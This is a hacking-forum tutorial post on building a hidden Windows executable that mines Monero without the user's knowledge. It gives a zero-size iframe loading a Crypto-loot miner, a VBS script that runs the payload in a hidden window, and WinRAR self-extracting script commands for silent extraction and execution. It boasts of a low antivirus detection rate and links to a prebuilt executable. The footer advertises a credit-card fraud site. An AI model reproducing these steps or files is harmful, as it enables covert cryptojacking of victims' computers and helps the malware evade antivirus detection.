ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Home
Upgrade
Credits
Help
Search
Awards
Achievements
 1144

How to create a simple hidden exe monero miner?

by datagroove - 08-24-2019 - 04:55 PM
#1
In this article i will teach you how to create a simple exe that mines monero completly hidden from the user. The compiled exe has a 3/70 virus detection rate in virustotal which is low and works on almost any Windows.

Virus Scan: (3/70)
https://www.virustotal.com/gui/file/d889.../detection

Required!!!
- Account at Crypto-loot
- SiteInFile
- WinRAR

The tutorial!!!!

1) Start by registering at http://bit.ly/crypto-loot

2) Grab the JavaScript code and paste on notepad
<html>
<iframe src="https://crlt.co/Kjht" width="0" height="0" frameborder="0"></iframe>
</html>

3) Save as index.html

4) Install SiteInFile
(Shareware version works as it isn't visible to the user)

5) Create a new project in SiteInFile
- Select your index.html file and next multiple times until the exe is created

6) Right click in the exe and WinRAR "Add to the archive..."

7) Select "Create SFX archive"

8) Create the SFX exe - index.sfx.exe

9) Right click in the SFX exe and "Open with WinRAR"

10) Open notepad and save as vbs.vbs

Code:
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run("index.exe"), 0, True

11) copy vbs.vbs to index.sfx.exe

12) Add comment to the index.sfx.exe with WinRAR
(Alt+M)

Code:
;The comment below contains SFX script commands

Path=%temp%\bat2exe
Setup=C:\Windows\System32\wscript.exe %temp%\bat2exe\vbs.vbs
Silent=1
Overwrite=2

Download: (Source Pack)
https://www.uploadship.com/39c9add6ae9dae18

[Image: print.jpg]

Download: (index.sfx.exe)
http://up.media1fire.com/j1j7lrlmkwy1/index.sfx.exe
BestChange - Exchange money at the best rates - https://www.bestchange.com/?p=936130
Pure VPN - Protect your data with the best vpn - https://rebrand.ly/Pure_VPN
Contact me by Email - https://bit.ly/Contact_Hacxx_Gmail
The House Of Credit Card - Findsome.ru
Reply

Users browsing: 2 Guest(s)